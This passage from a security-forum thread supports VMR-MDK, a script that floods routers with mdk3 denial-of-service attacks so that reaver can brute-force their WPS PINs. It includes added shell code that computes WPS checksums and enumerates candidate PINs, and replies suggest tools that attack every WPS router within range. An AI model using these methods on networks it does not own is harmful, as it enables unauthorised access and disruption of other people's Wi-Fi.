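# Added example: the arithmetic behind "all 11,000 WPS pins" and the
# 12345670 recheck. Not code from VMR-MDK or reaver.
# A WPS PIN has 8 digits; the 8th is a checksum over the first 7, so only
# 10^7 PINs are well formed. The registrar exchange leaks the two halves
# separately (M5 only arrives if digits 1-4 were right, M7 only if digits
# 5-7 were right), so reaver needs at most 10,000 + 1,000 = 11,000
# attempts rather than 10^7.

# strip_zeros N -> N without leading zeros (keeps "0" for an all-zero input),
# so that $(( )) does not read a zero-padded number as octal
strip_zeros() {
    n=$1
    n=${n#"${n%%[!0]*}"}
    echo "${n:-0}"
}

# wps_checksum PREFIX7 -> checksum digit for a 7-digit prefix:
# total = 3*(d1+d3+d5+d7) + (d2+d4+d6); the checksum brings total to a
# multiple of 10
wps_checksum() {
    n=$(strip_zeros "$1")
    odd=$(( n/1000000%10 + n/10000%10 + n/100%10 + n%10 ))
    even=$(( n/100000%10 + n/1000%10 + n/10%10 ))
    echo $(( (10 - (3*odd + even) % 10) % 10 ))
}

# wps_pin_valid PIN -> success if PIN is 8 digits with a correct checksum
wps_pin_valid() {
    pin=$1
    case $pin in
        [0-9][0-9][0-9][0-9][0-9][0-9][0-9][0-9]) ;;
        *) return 1 ;;
    esac
    [ "$(wps_checksum "${pin%?}")" = "${pin#???????}" ]
}

# wps_second_half_pins FIRST4 -> the 1,000 complete PINs left to try once
# the first half is known (digits 5-7 plus the checksum each one implies)
wps_second_half_pins() {
    f=$(strip_zeros "$1")
    j=0
    while [ "$j" -lt 1000 ]; do
        c=$(wps_checksum "$(( f*1000 + j ))")
        printf '%04d%03d%d\n' "$f" "$j" "$c"
        j=$((j+1))
    done
}

# Demo when run as: sh wps_pins.sh demo
if [ "${1:-}" = demo ]; then
    wps_pin_valid 12345670 && echo "12345670: checksum ok"
    echo "second-half candidates for 1234: $(wps_second_half_pins 1234 | wc -l)"
fi
```

    The point of the demo is that 12345670 is a perfectly well-formed PIN (checksum 0 over 1234567) and sits inside the ordinary second-half search, which is why a router that silently resets to it mid-attack can be missed by a run that tested it once at the start and never again.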

  33. #133
    Join Date
    2015-May
    Posts
    25
    To Mmusket33,

    To be honest, Kali 2016 rolling is not great.

    Because the routers I could easily crack within seconds with Wifite on Kali 2.0 Sana,

    Kali Rolling 2016, with the same version of Wifite (R87), could not get the WPS PIN, even after putting the router and the wireless adapter next to each other.

    That's kind of funny, because I guess there is something wrong with Kali Rolling.

    So I rolled back to Kali 2.0 Sana and Wifite cracks routers like a dream now.

    I hope Kali 2.0 Sana is supported further over the years.

    I'm updating Kali 2.0 Sana, and I have heard of a lot of great success with this version of Kali.

    I will use VMR-MDK on this version again and get back to you with updates.

    Thank you Mteam for your support.

  34. #134
    Join Date
    2016-Jul
    Posts
    1

    I can't unlock the router.

    Quote Originally Posted by mmusket33 View Post
    To machx

    Choosing 22 = n just removes the default pin recheck.

    If 22 = y/Y then the program runs two concurrent reaver attacks: a brute force attack checking all 11,000 WPS pins and, occasionally, a separate check of pin 12345670.

    It was found that some routers would reset their WPS system to 12345670 if subjected to constant DOS processes. If reaver had already checked this key at the very start of the attack, reaver would slowly check all the pins, climb to 99.99% and spin endlessly. If the attack was restarted, the WPS pin and WPA key would be found, and the key was always 12345670.

    It was also found that routers which never responded to any attempts to obtain pins for days would suddenly dump their WPS pin and WPA key. The key was always 12345670; then they would go back to being inert.

    To marsrolled

    The script only supports one adapter. MTeams sees no reason to use two. We tried DDOS with one adapter while trying to collect pins with a second device, but that never worked. We tried DDOS at the same time as running reaver with one adapter and, to our surprise, reaver could collect pins through the DDOS fog if the adapter conducted both operations. That approach probably needs to be looked at again.

    MTeams

    I am not as pro as y'all, but I tried unlocking the router with the help of your script and it isn't trying a single pin. From the start of the program it says "AP RATE LIMITING".
    I've tried all 15 MDK attacks, but the router is still locked in wash, and reaver cannot brute force a single pin. Any suggestions? Please pardon me for my lack of knowledge in this field.
    Last edited by sohilmalvat; 2016-07-20 at 07:50.

  35. #135
    Hi mmusket33, I have a problem with ESSIDs containing special characters, e.g. ">>>LIDIO<<<" and "Arte&Papel". Is it possible to fix it? I tried to edit the script VMR-MDK-K2_2016R-011x9.sh but did not find the line to correct. It does not create a log file in VARMACS_LOGS.
    thanks.
    Last edited by dmatrix; 2016-07-24 at 17:45.

  36. #136
    Join Date
    2013-Jul
    Posts
    844
    To: sohilmalvat

    The readme files note that the VMR-MDK approach only works with a small subset of routers. Suggest you consult the suggestions found in the readme on how to test for this vulnerability.

    MTeams

  37. #137
    Join Date
    2013-Mar
    Posts
    1
    Quick question, gentlemen and ladies: during the wash stage, I am getting bad FCS in the wash window. Would it be feasible to add the '--ignore-fcs' option to the wash call in the script? If not, how do you solve this dilemma? Thanks y'all.

  38. #138
    Join Date
    2016-Aug
    Posts
    1
    WPS transaction failed (code: 0x04). Please help me!


  39. #139
    Join Date
    2016-Sep
    Posts
    3
    I'm getting the exact same problem and I can't figure it out for the life of me. I've followed the steps both assuming that root is the home folder and that root is ./ . I first tried running Kali Live USB with 2016.1r, and then I tried installing, thinking it wasn't taking. Both of those failed, so I tried Kali Live USB 2.0 Sana, and that failed also. I'm at my wits' end! The following are the responses I get no matter what I try:

    bash: ./mdk3-v6/mdk3: No such file or directory

    bash: /root/mdk3-v6/mdk3: No such file or directory

    what am I doing wrong?

  40. #140
    Join Date
    2013-Jul
    Posts
    844
    You should not try to run this program from a live USB. Either use a hard drive install or a persistent USB. Do not try to run a USB with LUKS encryption.

    Make sure you are using VMR-MDK-K2-2016R-011x9.sh not older versions

    This program only works with a small number of routers. Read the help files and run the tests suggested. If the router shows the vulnerability then continue. If not try a different approach.

    Suggest you run varmacscan constantly when the computer is idle.

    MTeams

  41. #141
    Join Date
    2016-Sep
    Posts
    3
    Quote Originally Posted by mmusket33 View Post
    You should not try to run this program from a live USB. Either use a hard drive install or a persistent USB. Do not try to run a USB with LUKS encryption.

    Make sure you are using VMR-MDK-K2-2016R-011x9.sh not older versions

    This program only works with a small number of routers. Read the help files and run the tests suggested. If the router shows the vulnerability then continue. If not try a different approach.

    Suggest you run varmacscan constantly when the computer is idle.

    MTeams
    I am running kali 2016.1 on a hard drive install and I'm using VMR-MDK-K2-2016R-011x9. I wish I could get far enough to use VMR-MDK-K2-2016R-011x9.sh but I can't even get /root/mdk3-v6/mdk3 to work. It keeps giving me the following error no matter what I try:

    bash: /usr/local/sbin/mdk3: No such file or directory

    Even though I'm looking right at it when I run a dir command...very strange.

  42. #142
    Join Date
    2016-Sep
    Posts
    3
    Quote Originally Posted by mmusket33 View Post
    You should not try to run this program from a live USB. Either use a hard drive install or a persistent USB. Do not try to run a USB with LUKS encryption.

    Make sure you are using VMR-MDK-K2-2016R-011x9.sh not older versions

    This program only works with a small number of routers. Read the help files and run the tests suggested. If the router shows the vulnerability then continue. If not try a different approach.

    Suggest you run varmacscan constantly when the computer is idle.

    MTeams
    Never mind, I found out what was wrong... you need to be running the 32-bit version of Kali. The 64-bit version of Kali returns the "no such file" error, though what it really means is that it doesn't have the library to run 32-bit programs such as your mdk3. Thanks so much for your quick reply!

  43. #143
    If I had only seen this thread 5 minutes ago I wouldn't have just wiped my whole VM and started over. Thank you for pointing this out; I was at a complete loss as to where mdk3 went.
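
    The symptom in #139 to #143 (a binary that is plainly on disk but fails with "No such file or directory") is the kernel reporting that the dynamic loader named inside the ELF file, not the file itself, is missing; a 32-bit glibc binary asks for /lib/ld-linux.so.2, which a 64-bit Kali without 32-bit libraries does not have. The check below is an added example and not part of VMR-MDK or the packaged mdk3. It assumes, as #142 reports, that the shipped mdk3 is a 32-bit dynamically linked ELF, and it reads the ELF header and the loader path with od, tr and sed only, so it works on a bare install without binutils (where readelf -l would be the proper tool).

```shell
#!/bin/sh
# Added example; not code from the thread or the VMR-MDK package.
# "bash: /root/mdk3-v6/mdk3: No such file or directory" for a file that is
# present means the binary's requested dynamic loader (its PT_INTERP path)
# does not exist. These helpers diagnose that without executing anything.

# elf_class FILE -> 32, 64 or not-elf, taken from the ELF ident byte EI_CLASS
# (offset 4: 1 = ELFCLASS32, 2 = ELFCLASS64)
elf_class() {
    ident=$(od -An -tx1 -N5 "$1" 2>/dev/null | tr -d ' \n')
    case $ident in
        7f454c4601) echo 32 ;;
        7f454c4602) echo 64 ;;
        *) echo not-elf ;;
    esac
}

# elf_interp FILE -> the loader path, found as the first printable string of
# the form /.../ld-*.so* (what readelf -l shows as "Requesting program
# interpreter"). A string search, so it is a heuristic: static glibc
# binaries can still carry such a string for dlopen.
elf_interp() {
    tr -c '[:print:]' '\n' < "$1" |
        sed -n 's!^[^/]*\(/.*ld[-.][^ /]*\.so[.0-9]*\).*!\1!p' |
        head -n 1
}

# loader_check FILE -> 0 if the binary's loader is present (or none is
# requested), 1 with a one-line diagnosis otherwise
loader_check() {
    f=$1
    [ -f "$f" ] || { echo "$f: no such file"; return 1; }
    class=$(elf_class "$f")
    if [ "$class" = not-elf ]; then
        echo "$f: not an ELF binary (script, or a corrupt download?)"
        return 1
    fi
    interp=$(elf_interp "$f")
    if [ -z "$interp" ]; then
        echo "$f: ${class}-bit ELF, no loader requested (static)"
        return 0
    fi
    if [ -e "$interp" ]; then
        echo "$f: ${class}-bit ELF, loader $interp present"
        return 0
    fi
    echo "$f: ${class}-bit ELF wants loader $interp, which is missing"
    return 1
}

# Usage when run directly: sh elfcheck.sh /root/mdk3-v6/mdk3
if [ -n "${1:-}" ]; then
    loader_check "$1"
fi
```

    On a Debian-based install such as Kali the missing 32-bit loader is supplied by enabling the i386 architecture and installing libc6:i386 (dpkg --add-architecture i386; apt-get update; apt-get install libc6:i386), which avoids reinstalling a 32-bit system as #142 did; any further 32-bit libraries the binary needs show up with ldd once the loader is in place.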

  44. #144
    Join Date
    2013-Jul
    Posts
    844
    Regarding the modified mdk3 program that comes in the VMR-MDK download package: this mdk3 version does not replace any installed mdk3 program. The modified version is installed in root, and the program only accesses the modified mdk3 in root if you select a DDOS process that calls for an invalid ESSID. Hence, if you cannot install the modified mdk3 program, VMR-MDK will run fine. All that will occur is that if you select an invalid-ESSID DDOS process in the config file, the Xterm window will not run the process. Just change the DDOS process in the config file to any other process through leafpad or another text editor and continue.

    Musket Teams
    Last edited by mmusket33; 2016-09-07 at 11:51.

  45. #145
    Join Date
    2016-Sep
    Posts
    28
    Hi friends.
    No config files?
    Last edited by 1stcowgirl; 2016-09-10 at 06:19.

  46. #146
    I was wondering if anyone has run into this issue.

    I can only run it through one cycle and then it dies and spits out this line:

    usage: VMR-MDK-K2-2016R-011x9.sh <start|stop|check> <interface> [channel or frequency]

    Everything else runs smoothly; just trying to get it to continue running has proven to be an issue.

    I have chmod'ed it to 755
    also manually killed _supplicant & network-manager

    Any ideas?

    Thanks again for writing this!

  47. #147
    Join Date
    2013-Jul
    Posts
    844
    MTeams saw this occur during program construction. We had to slow the routines down so all commands between the wifi device and the computer could be completed successfully.

    Are you using LUKS encryption, or a USB cable connection to your wifi device longer than 5 meters? You are losing your connection to your wifi device. When the program tries to spoof the MAC addresses etc. it cannot start your device.

    Since you state the program runs successfully for one complete cycle, it is probably not in your initial setup. However, make sure you select line numbers for your devices when asked; do not enter mon0 or wlan0mon etc. This is a common error.

    MTeams

  48. #148
    Join Date
    2016-Sep
    Posts
    6
    I'm very grateful for the script. Nicely done. But I'm getting the same problem whatever I do. It keeps repeating the pin 12345670 on and on: WPS transaction failed (code 0x04). The script is running fine, and I set all the things as they should be, as the video shows. Injection is working, and I get a handshake. What am I doing wrong? I get the same problem running reaver on its own without this script. Please, can someone help me out?

  49. #149
    Join Date
    2013-Jul
    Posts
    844
    To Pietje

    You probably are doing nothing wrong. The router is simply not responding. You could try bully; try using AAnarchy's version, the link can be found in these forums. MTeams also suggests running varmacscan when your computer is not in use. Sometimes routers that do not respond to reaver pin requests suddenly begin functioning. Varmacscan will attack all WPS-enabled routers within reception range.

    Musket Teams

  50. #150
    Join Date
    2016-Sep
    Posts
    6
    Thanks for answering so quickly I'm going to look into asap.
